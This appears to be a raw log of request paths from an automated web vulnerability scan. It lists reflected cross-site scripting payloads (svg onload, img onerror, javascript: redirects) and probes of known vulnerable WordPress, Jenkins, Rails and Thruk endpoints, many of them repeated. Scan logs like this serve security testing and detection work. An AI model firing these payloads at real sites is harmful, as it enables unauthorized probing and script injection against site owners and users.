/web/wp-content/plugins/jh-404-logger/readme.txt
/web/ghost/preview
/web/cas/v1/tickets/
/web/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/wp-admin/options-general.php?page=yuzo-related-post
/web/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/web/index.php?rest_route=/whm/v3/themesettings
/web/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/web
/web/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/web/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/web/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/web/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/login.php/'%3E%3Csvg/onload=alert%6024s8Cx1tYDnMTM8dJ6o9OK2SBwO%60%3E
/web/wp-admin/options-general.php?page=yuzo-related-post
/web/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/web/index.php?rest_route=/whm/v3/themesettings
/web/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/web/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/web/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/web/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/web/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)
/web/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/login.php/'%3E%3Csvg/onload=alert%6024s8Cx1tYDnMTM8dJ6o9OK2SBwO%60%3E
/web/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/web/
/web/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa
/web/wp-admin/admin.php
/web/thruk/cgi-bin/login.cgi
/web/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/web/
/web/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa
/web/wp-admin/admin.php
/web/thruk/cgi-bin/login.cgi
/web/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.104%2Fweb%2Fwp-admin%2Fadmin.php&reauth=1
